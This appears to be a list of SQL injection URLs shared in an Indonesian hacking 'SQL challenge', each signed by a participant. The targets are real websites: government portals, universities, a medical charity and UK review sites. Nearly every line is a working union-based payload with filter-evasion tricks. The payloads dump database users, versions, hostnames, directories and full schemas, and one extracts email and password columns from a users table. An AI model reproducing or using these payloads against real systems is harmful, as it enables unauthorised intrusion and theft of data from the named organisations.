106Revo : http://www.microtek.com/products.php?KindID=6&ID=1 =75=75 union select 1,2,3,4,5,6,CONCAT('Injected by R3V0',0x3c62723e,USER(),0x3c62723e,DATABASE(),0x3c62723e,VERSION()),8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70--
107https://jdih.anri.go.id/indexdev.php?pages=peraturan&id_peraturan=-444 /*!50000%55nion*/ /*!50000%53elect*/ 1,2,3,4,5,Concat%280x696e6a65637465642062792052335630,0x3c62723e,user/**x**/%28%29,0x3c62723e,database/**x**/%28%29,0x3c62723e,@@version,0x3c62723e,@@hostname,0x3c62723e,@@datadir,make_set%286,@:=0x20,%28/*!50000%53elect%281%29/*!50000from*/%28/*!50000information_schema*/.columns%29where@:=make_set%28511,@,0x3c6c693e,/*!50000table_name*/,/*!50000column_name*/%29%29,@%29%29,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42-- -
108https://jolemi.com/index.php?route=blog/article&article_id=74' having 0 union select 1,2,3,4,5,6,7,8,1,2,3,4,5,6,Concat('Injected By RHawkz404','<br>','Version :: ',version(),'<br>','Database :: ',database(),'<br>','User :: ',user(),'<br>',(SELECT GROUP_CONCAT(table_name,' :: ',column_name SEPARATOR '<br>') FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_SCHEMA=DATABASE())),8,1,2,3,4,5,6;%00
109https://jolemi.com/index.php?route=blog/article&article_id=-74%27+/*!50000UNION*/+ALL+/*!50000SELECT*/+1,2,3,4,5,6,7,8,9,10,11,12,/*!12345Concat*/(%27%3Cbr%3E%27,%27Inject%20By%20Cipuyz%27,%27%3Cbr%3E%27,%27Version%20::%20%27,version/**_**/(),%27%3Cbr%3E%27,%27Database%20::%20%27,database/**_**/(),%27%3Cbr%3E%27,%27%20Port%20::%20%27,@@port,%27%3Cbr%3E%27,%27%3C/font%3E%27,%27%3Cbr%3E%27,%27User%20::%20%27,user(),%27%3Cbr%3E%27,(select(@x)/*!50000from*/(/*!50000select*/(@x:=0x00),(select(0)/*!From*/(/*!50000information_schema.columns*/)/*!50000where*/(table_schema=database/**_**/())and(0x00)in(@x:=/*!50000coNcat*/%20(@x,0x3c62723e,/*!50000table_name*/,0x203a3a20,/*!50000column_name*/))))x)),14,15,16,17,18,19,20,21,22;%00
110
111
112 https://jolemi.com/index.php?route=blog/article&article_id=.74' union select 1,2,3,4,5,6,7,8,9,10,11,1,2,3,Concat('Injected By Hostketeer','<br>','Version :: ',version(),'<br>','Database :: ',database(),'<br>','User :: ',user(),'<br>',(select(@x)from(select(@x:=0x00),(select(0)From(information_schema.columns)where(table_schema=database())and(0x00)in(@x:=CoNCaT(@x,'<br>',table_name,'::',column_name))))x)),5,6,7,8,9,10,11;%00
113https://www.belitungisland.com/new/_info.php?id=-19%27+UNION+ALL+SELECT+1,2,3,4,%28Select%20export_set%285,@:=0,%28select%20count%28*%29from%28users%29where@:=export_set%285,export_set%285,@,email,0x3c6c693e,2%29,password,0xa3a,2%29%29,@,2%29%29,6,7,8,9,10,11,12,13--+-
114
115
116Thanks buat solvers .
117Semoaga yg lain bisa belajar
118My query : http://www.ukrimuniversity.ac.id/detail.php?kt=20&kn=-311%27%20/*!50000union*/%20/*!50000select*/%20null,null,null,null,null,null,null,null,/*!50000concat*/(0x222f3e3c2f696672616d653e3c63656e7465723e3c2f6469763e3c2f6469763e3c62723e3c62723e3c62723e3c62723e,0x496e6a6563746564204279202e2f4b6173616e746170,0x3c62723e,0x4461746162617365203a3a20,database(),0x3c62723e,0x5665727369203a3a20,version(),0x3c62723e,0x446972203a3a20%20,@@datadir,0x3c62723e,0x506f7274203a3a2020,@@port)--+
119
120Query nikolas : http://www.ukrimuniversity.ac.id/Âdetail.php?kt=20&kn=.311 ' /*!50000union*/ select 1,2,3,1,2,Concat('Injected By Hostketeer','<br>','Version :: ',version(),'<br>','Database :: ',database(),'<br>'),7,8,9-- -
121
122Query aknanta : http://www.ukrimuniversity.ac.id/Âdetail.php?kt=-20%27+%2F%2A%2150000UNION%2A%2F+ALL+SELECT+1111%2C2222%2C3333%2C44Â44%2Cconcat (%27%3Cimg%20src=%22Âhttps://pbs.twimg.com/media/ÂDDF5r0mUQAEEiQI.jpg%22%20width=%22240px%22%20height=%22240px%Â22%3E%27,"<br>",'Injected By xSana','<br>',database(),'<br>',version(),'<br>',@@port),6666,7777,8888,9999--%20-&kn=311
123
124Query henry thiago : http://www.ukrimuniversity.ac.id/Âdetail.php?kt=-1 ' /*!50000UNION*/ ALL /*!50000SELECT*/ 1111,2222,3333,4444,/*!50000Concat*/('Injected by Th!4g0','<br>','Database :: ',DATABASE(),'<br>','Version :: ',VERSION()),6666,77Â77,8888,9999-- -&kn=468-UniversitasÂKristenImmanuel
125Query : http://www.frwebhost.com/index.php?page=berita&no=8' and false /*!50000Union*/ Select 1,2,3,4,5,6,/*!50000Concat*/(0x3c62723e,'Injected by Fansa',0x3c62723e,'USER :: ',user(),0x3c62723e,'DATABASE :: ',database(),0x3c62723e,'HOSTNAME :: ',@@hostname,0x3c62723e,'VERSION :: ',@@version,0x3c62723e,'PORT :: ',@@port,0x3c62723e,'DIR :: ',@@datadir,0x3c62723e,make_set(6,@:=0x20,(select(1)from(information_schema.columns)where@:=make_set(511,@,0x3c6c693e,table_name,column_name)),@)),8,9-- -
126
127
128
129http://diskominfo.pesisirselatankab.go.id/berita
130post method:
131kata=%27 union select 1,2,3,concat('Injected by R3V0',0x3c62723e,user(),0x3c62723e,version(),0x3c62723e,database()),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29-- -&msp=1
132
133
134Lucifear Raquel Randovlsky
135https://jdih.cianjurkab.go.id/ViewPerbub.php?id=-396+union+select+1%2CConcat(0x3c43656e7465723e,0x6b656e746f7420627920466174757220616b61204b696e67205a657230,0x3c62723e,0x3c62723e,Version(),0x3c62723e,Database(),0x3c62723e,User(),@C:=0x3c62723e,If((Select+Count(*)+From+Information_Schema.Columns+Where+Table_Schema=Database()+And+@C:=Concat(@C,0x3c62723e,Table_Name,0x3a,0x3a,0x3a,0x3a,Column_Name)),0x3a,0x00),@C),3,4,5--+
136Cindy Yuvia
137https://jdih.cianjurkab.go.id/ViewPerbub.php?id=-396+union+select+1%2C2%2Cconcat(@c:=0x00,0x3c666f6e7420666163653d27436f7572696572204e6577272073697a653d27342720636f6c6f723d27726564273e5b2b5d3c623e3c666f6e7420636f6c6f723d22626c61636b223e496e6a65637465642042792035756c37373768306e36683035743c2f666f6e743e3c2f623e3c2f613e3c62723e,if((select%20count(*)%20from%20information_schema.columns%20where%20table_schema%20not%20like%200x696e666f726d6174696f6e5f736368656d61%20and%20@c:=concat(@c,0x3c62723e,table_name,0x2e,column_name)),0x00,0x00),@c),4,5--+
138Relarizky
139https://jdih.cianjurkab.go.id/ViewPerbub.php
140?id=-396+and+@x:=(select group_concat(table_name,' : ',column_name,'<br>') from information_schema.columns WHERE table_schema=database())+union+select+1,@x,3,4,5--+
141https://jdih.cianjurkab.go.id/ViewPerbub.php?id=-396+union+select+1,2,3,4,5--+
142
143=== Write Up ===
144#IDChall
145#SQLChall
146
147Mine :
148http://www.dysautonomiainternational.org/page.php?ID=.30+/**//*!12345UNION%20SELECT*//**/+1,2,concat/**_**/(%27<br>%27,%27<img%20src="https://edmli.com/wp-content/uploads/2018/04/620x310.jpg"%20height="300"%20width="300">%27,%27<br>%27,%27Injected%20By%20m337ight%27,%27</font>%27,%27<br>%27,%27Version%20::%20%27,version/**_**/(),%27</font>%27,%27<br>%27,%27Database%20::%20%27,database/**_**/(),%27</font>%27,%27<br>%27,%27Os%20::%20%27,@@version_compile_os,%27</font>%27,%27<br>%27,%27</font>%27,%27<br>%27,(select(@x)/*!50000from*/(/*!50000select*/(@x:=0x00),(select(0)/*!From*/(/*!50000information_schema.columns*/)/*!50000where*/(table_schema=database/**_**/())and(0x00)in(@x:=/*!50000coNcat*/%20(@x,0x3c62723e,/*!50000table_name*/,0x203a3a20,/*!50000column_name*/))))x)),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21--%20-
149
150Baim Kun :
151http://www.dysautonomiainternational.org/page.php?ID=-37%20/*!50000UnIoN*/%20/*!50000SeLeCt*/%201,2,concat/**_**/(%27%3Cbr%3E%27,%27%3Cimg%20src=%22https://vignette.wikia.nocookie.net/disney/images/0/03/Miguel-dante.png%22%20height=%22200%22%20width=%22200%22%3E%27,%27%3Cbr%3E%27,%27%3Cfont%20color=%22red%22%3E%20Inject%20By%20Baim%27,%27%3C/font%3E%27,%27%3Cbr%3E%27,%27%3Cfont%20color=%22red%22%3E%20Version%20::%20%27,version/**_**/(),%27%3C/font%3E%27,%27%3Cbr%3E%27,%27%3Cfont%20color=%22red%22%3E%20Database%20::%20%27,database/**_**/(),%27%3C/font%3E%27,%27%3Cbr%3E%27,%27%3Cfont%20color=%22red%22%3E%20Port%20::%20%27,@@port,%27%3C/font%3E%27,%27%3Cbr%3E%27,%27%3C/font%3E%27,%27%3Cbr%3E%27,%27%3Cfont%20color=%22red%22%3E%20Hostname%20::%20%27,@@hostname,%27%3C/font%3E%27,%27%3Cbr%3E%27,(select(@x)/*!50000from*/(/*!50000select*/(@x:=0x00),(select(0)/*!From*/(/*!50000information_schema.columns*/)/*!50000where*/(table_schema=database/**_**/())and(0x00)in(@x:=/*!50000coNcat*/%20(@x,0x3c62723e,/*!50000table_name*/,0x203a3a20,/*!50000column_name*/))))x)),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21--
152
153Owens Joko Prabowo :
154http://www.dysautonomiainternational.org/page.php?ID=-5+/*!12345union*/+/*!12345select*/+1,2,/*!50000CONCAT*/(%27<br>%27,%27<img%20src="http://www.bangladesherkhabor.net/resources/uploads/IMG-20180621-WA0099.jpg"%20height="200"%20width="200">%27,%27<br>%27,%27<font%20color="red">%20Injected%20By%20Mr.Zhydra145%27,%27</font>%27,%27<br>%27,%27<font%20color="green">%20Version%20::%20%27,version/**_**/(),%27</font>%27,%27<br>%27,%27<font%20color="green">%20Database%20::%20%27,database/**_**/(),%27</font>%27,%27<br>%27,%27<font%20color="green">%20User%20::%20%27,user/**_**/(),%27</font>%27,%27<br>%27,(select(@x)/*!50000from*/(/*!50000select*/(@x:=0x00),(select(0)/*!From*/(/*!50000information_schema.columns*/)/*!50000where*/(table_schema=database/**_**/())and(0x00)in(@x:=/*!50000coNcat*/%20(@x,0x3c62723e,/*!50000table_name*/,0x203a3a20,/*!50000column_name*/))))x)),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21+--+
155
156Aknanta :
157http://www.dysautonomiainternational.org/page.php?ID=-103+/*!50000UNION*/+ALL+SELECT+1,2,/*!50000Concat*/(0x3c63656e7465723e3c666f6e74207374796c653d22636f6c6f723a677265656e3b746578742d736861646f773a307078203170782035707820233030303b666f6e742d73697a653a33307078223e496e6a65637465642062792053616e613c2f666f6e743e3c62723e3c696d672077696474683d22323430707822206865696768743d22323430707822207372633d2268747470733a2f2f7062732e7477696d672e636f6d2f6d656469612f4444463572306d55514145456951492e6a7067223e,0x3c62723e,0x55534552202d3e%20,USER(),0x3c62723e,0x4441544142415345202d3e%20,DATABASE(),0x3c62723e,0x56455253494f4e202d3e,VERSION(),0x3c62723e,0x486f73746e616d65202d3e,@@HOSTNAME,0x3c62723e,0x506f7274202d3e,@@PORT,0x3c62723e,(select(@x)from(select(@x:=0x00),(select(0)from(information_schema.columns)where(table_schema=database())and(0x00)in(@x:=concat+(@x,0x3c62723e,table_name,0x203a3a20,column_name))))x)),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21--%20-
158
159Paw Paw :
160http://www.dysautonomiainternational.org/page.php?ID=.43+/*!50000UNION*/+/*!50000SELECT*/+1,2,concat/*!(unhex(hex(concat/*!(0x3c2f6469763e3c2f696d673e3c2f613e3c2f703e3c2f7469746c653e,0x223e,0x273e,0x3c62723e3c62723e,unhex(hex(concat/*!(0x3C696D67207372633D2268747470733A2F2F692E70696E696D672E636F6D2F6F726967696E616C732F32352F30382F64372F32353038643735613166633161653165373734366134396261633236663637322E6A7067222077696468743D22373022206865696768743D223730223E,0x3C62723E496E6A65637420427920506978656C2D436F6465))),0x3c62723e3c62723e,0x3C666F6E7420636F6C6F723D6F72616E67653E4D7953514C2056657273696F6E203A3A20,version(),0x7e20,@@version_comment,0x3C62723E506F7274203A3A20,@@port,0x3c62723e5072696d617279204461746162617365203a3a20,@d:=database(),0x3c62723e44617461626173652055736572203a3a20,user(),(/*!12345selEcT*/(@x)/*!from*/(/*!12345selEcT*/(@x:=0x00),(@r:=0),(@running_number:=0),(@tbl:=0x00),(/*!12345selEcT*/(0)%20from(information_schema./**/columns)where(table_schema=database())%20and(0x00)in(@x:=Concat/*!(@x,%200x3c62723e,%20if(%20(@tbl!=table_name),%20Concat/*!(0x3C666F6E7420636F6C6F723D6F72616E67652073697A653D333E,0x3c62723e,0x3c666f6e7420636f6c6f723d626c61636b3e,LPAD(@r:=@r%2b1,%202,%200x30),0x2e203c2f666f6e743e,@tbl:=table_name,0x203C666F6E7420636F6C6F723D626C75653E3A3A204461746162617365203A3A203C666F6E7420636F6C6F723D626C61636B3E28,database(),0x293c2f666f6e743e3c2f666f6e743e,0x3c2f666f6e743e,0x3c62723e),%200x00),0x3c666f6e7420636f6c6f723d626c61636b3e,LPAD(@running_number:=@running_number%2b1,3,0x30),0x2e20,0x3c2f666f6e743e,0x3c666f6e7420636f6c6f723d7265643e,column_name,0x3c2f666f6e743e))))x)))))*/,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21--%20-
161
162Rahmat Faisal Amin :
163http://www.dysautonomiainternational.org/page.php?ID=-5+/*!50000union*/+/*!50000select*/+1,2,/*!50000CONCAT*/(%27%3Cbr%3E%27,%27%3Cimg%20src=%22http://foogahsap.com/aw.jpg%22%3E%27,%27%3Cbr%3E%27,%27%3Cfont%20color=%22gold%22%3E%20Injected%20By%20Z-I%20SLOW%27,%27%3C/font%3E%27,%27%3Cbr%3E%27,%27%3Cfont%20color=%22silver%22%3E%20Version%20::%20%27,version/**_**/(),%27%3C/font%3E%27,%27%3Cbr%3E%27,%27%3Cfont%20color=%22gold%22%3E%20Database%20::%20%27,database/**_**/(),%27%3C/font%3E%27,%27%3Cbr%3E%27,%27%3Cfont%20color=%22silver%22%3E%20User%20::%20%27,user/**_**/(),%27%3C/font%3E%27,%27%3Cbr%3E%27),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21--+
164
1654 Solver, share query
166
167Mine :
168http://whatmakesu.com/num.php?idnum=93%20/*!00000union*/select%201,0x417274656676636b6572,3,4,5,version(),user(),8,9--+
169
170Aknanta :
171http://www.whatmakesu.com/num.php?idnum=127%20%2F*!50000UNION*%2F%20ALL%20SELECT%201%2C%2F*!50000concat*%2F(database()%2C0x3c62723e%2Cuser()%2C0x3c62723e%2Cversion())%2C3%2C4%2C5%2C6%2C%2F*!50000concat*%2F(0x53616e61%2C0x3c62723e%2C0x3c696d67207372633d2268747470733a2f2f7062732e7477696d672e636f6d2f6d656469612f4444463572306d55514145456951492e6a7067222077696474683d22323430707822206865696768743d223234307078223e20)%2C8%2C9--%20-
172
173Arfian Dicky :
174http://www.whatmakesu.com/num.php?idnum=127%20%2F*!13337union*%2F%20%2F*!13337select*%2F%201%2C%2F*!13337concat*%2F(0x494e4a454354204259202e2f58493455373c62723e56455253494f4e203a3a20%2C%40%40version%2C0x3c62723e55534552203a3a20%2C%2F*!13337user*%2F())%2C3%2C4%2C5%2C6%2C7%2C8%2C9--%20-
175
176Kisanak :
177http://whatmakesu.com/search.php?zipc=-55812%20%2F*!00000union*%2F%20%2F*!00000select*%2F%201%2C%2F*!00000concat*%2F(0x3C62723E3C666F6E7420636F6C6F723D7265643E496E6A6563746564204279202E2F39686F73743C2F666F6E743E3C62723E3C62723E3C696D67207372633D22687474703A2F2F63646E2E706272642E636F2F696D616765732F487278725461502E6A7067222077696474683D22323030707822206865696768743D223230307078223E3C62723E3C62723E%2C0x55736572203A3A20%2Cuser()%2C0x3C62723E4461746162617365203A3A20%2Cdatabase()%2C0x3C62723E56657273696F6E203A3A20%2Cversion()%2C0x3C62723E486F73746E616D65203A3A20%2C%40%40hostname%2C0x3C62723E506F7274203A3A20%2C%40%40port%2C0x3C62723E)%2C3%2C4%2C5%2C6%2C7%2C8%2C9--%20
178
179Rio Griya :
180http://whatmakesu.com/num.php?idnum=1168 /*!50000UnION SeLECT*/ 111111,222222,333333,444444,555555,/*!50000Concat*/(0x496e6a65637465642042792052536875636b343034,0x3c62723e,0x56657273696f6e203a3a20,version(),0x3c62723e,0x4461746162617365203a3a20,database(),0x3c62723e,0x55736572203a3a20,user()),777777,88888,99999-- -
181
182Jainudin Rohman :
183http://whatmakesu.com/search.php?zipc=-55123%20%2F*!50000union*%2F%20%2F*!50000select*%2F%201%2C0x417375206b6f656e%2C3%2C4%2C5%2Cversion()%2Cuser()%2C8%2C9--%20-
184
185
186// Query SQLChall
187
188Site : http://disnakertrans.jatengprov.go.id/
189
190My Query # : http://disnakertrans.jatengprov.go.id/index.php/berita/lihat/?id=27'UNION SELECT 1,2,Concat(0x3c63656e7465723e3c696d67207372633d2768747470733a2f2f692e696d6775722e636f6d2f6a544e69514d722e6a706727206865696768743d27323025272077696474683d313025273e,0x3c62723e,0x496e6a6563742062792045784c696e6565,0x3c62723e,0x3c62723e,0x75736572203e3e3e20,user/**x**/(),0x3c62723e,0x6461746162617365203e3e3e20,database/**x**/(),0x3c62723e,0x76657273696f6e203e3e3e20,@@version,0x3c62723e,0x686f73746e616d65203e3e3e20,@@hostname,0x3c62723e,0x706f7274203e3e3e20,@@port,0x3c62723e,0x62617365646972203e3e3e20,@@basedir,0x3c62723e,0x64617461646972203e3e3e20,@@datadir,0x3c62723e,0x55554944203e3e3e20,UUID(),0x3c62723e),4,5,6,7,8,9,10,11--+
191
192Kindol Query # : http://disnakertrans.jatengprov.go.id/index.php/profil/detail/?id=-25%27+UNION+SELECT+1,2,concat(0x496e6a6563746564204279202e2f4d722e4b696e646f4c3c62723e3c696d67207372633d22687474703a2f2f73696d706c652d6c6966652e63662f48432e706e67222077696474683d2232303022206865696768743d22323030223e,%27<br>%27,%27Version%20::%20%27,version(),%27<br>%27,%27Database%20::%20%27,database(),%27<br>%27,%27User%20::%20%27,user(),%27<br>%27,(select(@x)from(select(@x:=0x00),(select(0)From(information_schema.columns)where(table_schema=database())and(0x00)in(@x:=CoNCaT(@x,%27<br>%27,table_name,%27::%27,column_name))))x)),4,5,6,7,8,9,10--+
193
194Aknanta Query # : http://disnakertrans.jatengprov.go.id/index.php/profil/detail/?id=-24%27 Union Select 1,2,/*!50000Concat*/(0x3c63656e7465723e3c666f6e74207374796c653d22636f6c6f723a677265656e3b746578742d736861646f773a307078203170782035707820233030303b666f6e742d73697a653a33307078223e496e6a65637465642062792053616e613c2f666f6e743e3c62723e3c696d672077696474683d22323430707822206865696768743d22323430707822207372633d2268747470733a2f2f7062732e7477696d672e636f6d2f6d656469612f4444463572306d55514145456951492e6a7067223e,0x3c62723e,0x55534552202d3e ,USER(),0x3c62723e,0x4441544142415345202d3e ,DATABASE(),0x3c62723e,0x56455253494f4e202d3e,VERSION(),0x3c62723e,0x486f73746e616d65202d3e,@@HOSTNAME,0x3c62723e,0x506f7274202d3e,@@PORT,0x3c62723e,@@datadir,0x3c62723e,@@basedir,0x3c62723e,UUID(),0x3c62723e,(select(@x)from(select(@x:=0x00),(select(0)from(information_schema.columns)where(table_schema=database())and(0x00)in(@x:=concat+(@x,0x3c62723e,table_name,0x203a3a20,column_name))))x)),4,5,6,7,8,9,10--%20-
195
196Fredley Antonny Query # : http://disnakertrans.jatengprov.go.id/index.php/profil/detail/?id=51%27+and+false+union+select+1,2,concat/**_**/(%27<br>%27,%27<img%20src="https://edmli.com/wp-content/uploads/2018/04/620x310.jpg"%20height="300"%20width="200">%27,%27<br>%27,%27Injected%20by%20m337ight%27,%27</font>%27,%27<br>%27,%27Version%20::%20%27,version/**_**/(),%27</font>%27,%27<br>%27,%27Database%20::%20%27,database/**_**/(),%27</font>%27,%27<br>%27,%27Os%20::%20%27,@@version_compile_os,%27</font>%27,%27<br>%27,%27</font>%27,%27<br>%27,(select(@x)/*!50000from*/(/*!50000select*/(@x:=0x00),(select(0)/*!From*/(/*!50000information_schema.columns*/)/*!50000where*/(table_schema=database/**_**/())and(0x00)in(@x:=/*!50000coNcat*/%20(@x,0x3c62723e,/*!50000table_name*/,0x203a3a20,/*!50000column_name*/))))x)),4,5,6,7,8,9,10--%20-
197
198Revan AR Query # : http://disnakertrans.jatengprov.go.id/index.php/profil/detail/?id=-22%27%20and%200%20+union+select%201,2,concat(%27<img%20src="https://i.pinimg.com/originals/b8/73/32/b873320cd1cbb0fa19b9d99f44532a17.png"%20height=200%20width=200%20/>%27,%27<br><font%20color="maroon"%20size=4>Injected%20by%20M1nic0de<br>%27,%27<font%20%20size=2>database%20::%20%27,database(),%27<br>user%20::%20%27,user(),%27<br>version%20::%20%27,version(),%27<br>hostname%20::%20%27,@@hostname,%27<br>UUID%20Key%20::%20%27,UUID(),%27<br>port%20::%20%27,@@port),4,5,6,7,8,9,10--+
199
200Amir Hossan Rahel Query # :
201http://disnakertrans.jatengprov.go.id/index.php/profil/detail/?id=.24%27%20union%20select%201,2,concat(0x696e6a65637465642062792068756e74657220696e6a6563746f72,0x3c62723e,user(),0x3c62723e,version(),0x3c62723e,database(),0x3c62723e,@@datadir,0x3c62723e,@@port,0x3c62723e,uuid()),4,5,6,7,8,9,10--+
202
203Erik Hutabarat Query # : http://disnakertrans.jatengprov.go.id/index.php/berita/lihat/?id=.3%27+union+select+1,2,3,concat(%27<h1>Handsomeware</h1>%27,0x3c696d67207372633d2268747470733a2f2f312e62702e626c6f6773706f742e636f6d2f2d314851736e794749476f732f56343364746961394755492f4141414141414141414d302f5f714136316f6b43424e73464270466433444461514a4135753748487a554a5f41434c63422f73313630302f37393736366531663961663732623066353737373163363233313664646339312e676966222f3e,user(),%27<br>%27,version(),%27<br>%27,database(),%27<br>%27,@@datadir,%27<br>%27,uuid(),@@hostname,%27<br>%27,(Select+export_set(5,@:=0,(select+count(*)from(information_schema.columns)where@:=export_set(5,export_set(5,@,table_name,0x3c6c693e,2),column_name,0xa3a,2)),@,2))),5,6,7,8,9,10,11--+-
204
205Pow Pow Query # : http://disnakertrans.jatengprov.go.id/index.php/profil/detail/?id=-24%27+union+all+select+1,2,Concat(%27%3Cimg%20src=%22http://www.makiya.sch.id/wp-content/uploads/2017/08/coiztrtteammmmmm.png%22%3E%27,%27%3Cbr%3E%27,%27%3Cfont%20color=%22black%22%3E%3Ci%3E%3Cb%3EInjected%20by%20Rev9%3C/b%3E%3C/i%3E%27,%27%3Cbr%3E%27,%27%3Cfont%20color=%22red%22%3EPort:%20%27,@@port,%27%3Cbr%3E%27,%27%3Cfont%20color=%22red%22%3EVersi:%20%27,Version(),%27%3Cbr%3E%27,%27%3Cfont%20color=%22red%22%3E%20Hostname%20:%20%27,/*!13337@@hostname*/,%27%3C/font%3E%27,%27%3Cbr%3E%27,%27%3Cfont%20color=%22red%22%3EDatabase:%20%27,Database(),%27%3Cbr%3E%27,%27%3Cfont%20color=%22red%22%3EUser:%20%27,User(),%27%3Cbr%3E%27,%27%3Cfont%20color=%22red%22%3EUUID:%20%27,UUID(),%27%3Cbr%3E%27,%27%3Cfont%20color=%22red%22%3ESymlink:%20%27,@@Global.have_symlink,%27%3Cbr%3E%27,%27%3Cfont%20color=%22lime%22%3E-----------------%27,@C:=0x00,If((Select+Count(*)+From+Information_Schema.Columns+Where+Table_Schema=Database()+And+@C:=Concat(@C,0x3c62723e,Table_Name,0x3a,Column_Name)),0x00,0x00),@c,0x3c2f466f6e743e,0x3c2f43656e7465723e),4,5,6,7,8,9,10--+
206www.finvent.com/details.php?id=-23'++OR+1+GROUP+BY+CONCAT_WS(0x3a,user(),FLOOR(RAND(0)*2))+HAVING+MIN(0)+OR+1--+-
207
208
209My query : https://allchecked.co.uk/reviews/leicestershire/asutton-roofing-ltd'AND+0+UNION+SELECT+1,2,concat(0x273c696d67207372633d68747470733a2f2f696d61676573352e616c706861636f646572732e636f6d2f3832312f7468756d622d3335302d3832313032342e706e67206865696768743d3135302077696474683d313530202f3e27,0x273c62723e27,0x273c623e27,0x273c666f6e7420666163653d22436f6d69632053616e73204d532220636f6c6f723d22626c7565222073697a653d343e3c693e496e6a6563746564206279202e2f6b336e74616e6731313c2f693e3c2f666f6e743e27,0x273c62723e27,0x273c623e27,0x27706f7274203a3a2027,@@port,0x273c62723e27,0x2775736572203a3a2027,user(),0x273c62723e27,0x276461746162617365203a3a2027,database(),0x273c62723e27,0x2776657273696f6e203a3a2027,version(),0x273c62723e27,0x27686f73746e616d65203a3a2027,@@hostname,0x273c62723e27,0x2762617365646972203a3a2027,@@basedir,0x273c62723e27,0x2764617461646972203a3a2027,@@datadir,0x273c62723e27,0x27746d7020646972203a3a2027,@@tmpdir,0x273c62723e27,0x2773796d6c696e6b203a3a2027,@@have_symlink,0x273c62723e27,0x2753534c203a3a2027,@@have_ssl,0x273c62723e27,0x2755554944203a3a2027,UUID(),0x273c62723e27,0x2773797374656d2075736572203a3a2027,system_user(),0x273c62723e27,0x2756657273696f6e20436f6d70696c65204f53203a3a2027,@@VERSION_COMPILE_OS,0x273c62723e27,0x27626f6f6c65616e2073796e746178203a3a2027,@@FT_BOOLEAN_SYNTAX),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28--+-
210
211Aknanta : https://allchecked.co.uk/reviews/cardiff/pbr--windows'%20Union%20Select%201,2,concat(0x3c63656e7465723e3c666f6e74207374796c653d22636f6c6f723a677265656e3b746578742d736861646f773a307078203170782035707820233030303b666f6e742d73697a653a33307078223e496e6a65637465642062792053616e613c2f666f6e743e3c62723e3c696d672077696474683d22323430707822206865696768743d22323430707822207372633d2268747470733a2f2f7062732e7477696d672e636f6d2f6d656469612f4444463572306d55514145456951492e6a7067223e,0x3c62723e,0x55534552202d3e%20,USER(),0x3c62723e,0x4441544142415345202d3e%20,DATABASE(),0x3c62723e,0x56455253494f4e202d3e,VERSION(),0x3c62723e,0x486f73746e616d65202d3e,@@HOSTNAME,0x3c62723e,0x506f7274202d3e,@@PORT,0x3c62723e,(select(@x)from(select(@x:=0x00),(select(0)from(information_schema.columns)where(table_schema=database())and(0x00)in(@x:=concat+(@x,0x3c62723e,table_name,0x203a3a20,column_name))))x)),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28--%20-
212
213Udje : https://allchecked.co.uk/reviews/nottinghamshire/-knb-kitchennbathrooms'%20UNION%20SELECT%201,2,Concat(0x3c63656e7465723e3c696d67207372633d2768747470733a2f2f696d6167652e6962622e636f2f6e78526d75792f69636f6e312e706e6727206865696768743d27313825272077696474683d313825273e,0x3c62723e3c666f6e7420636f6c6f723d233133304534363e3c68323e2f2a2120496e6a6563746564206279204d722e34723748753132202a2f3c2f68323e,@@version_compile_os,0x20,@@hostname,0x3a,uuid(),0x3a,@@port,0x20,@@version_compile_machine,0x3c62723e4d7953514c2056657273696f6e203a20,version(),0x3c62723e4461746162617365203a20,database(),0x3c62723e55736572203a20,user(),0x3c62723e),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28--%20-
214
215
216Dicky alveira : https://allchecked.co.uk/reviews/essex/info-at--mpercivalroofingcouk'%20UNION%20SELECT%201,2,CONCAT(0x3c696d67207372633d2268747470733a2f2f692e696d6775722e636f6d2f536855427633492e6a7067222077696474683d2231303022206865696768743d22313030223e,0x3c62723e,0x3c666f6e742073697a653d22352220636f6c6f723d22626c7565223e20496e6a6563746564204279205261796d6f6e64373c2f666f6e743e,0x3c62723e,0x3c62723e,@@hostname,0x3c62723e,@@version,0x3c62723e,@@basedir,0x3c62723e,user(),0x3c62723e,database(),0x3c62723e,@@HAVE_SYMLINK,0x3c62723e,@@datadir,0x3c62723e,@@port),4,5,6,7,8,9,10,11,12,13,24,15,16,17,18,19,20,21,22,23,24,25,26,27,28--%20-
217
218Isoroku yamamoto : https://Âallchecked.co.uk/Âreviews/cornwall/Â-allens-flat-roofing'Â+UNION+SELECT%201,2,Âconcat('injected+by+sembotÂ','<br>',user(),'<brÂ>',database(),'<br>'Â,@@hostname,'<br>',@Â@have_symlink),4,5,6Â,7,8,9,10,11,12,13,1Â4,15,16,17,18,19,20,Â21,22,23,24,25,26,27Â,28--+-
219
220Amir : https://Âallchecked.co.uk/Âreviews/angus/Âtayside-.windows'%20uÂnion%20select%201,2,Âconcat('injected%20by%20huÂnter%20injector',0x3Âc62723e,version(),0xÂ3c62723e,user(),0x3cÂ62723e,database(),0xÂ3c62723e,@@hostname,Â0x3c62723e,@@datadirÂ,0x3c62723e,@@PORT),Â4,5,6,7,8,9,10,11,12Â,13,14,15,16,17,18,1Â9,20,21,22,23,24,25,Â26,27,28--+
221
222
223
224// Query SQLChall
225
226Site : http://www.santaanazoo.org/
227
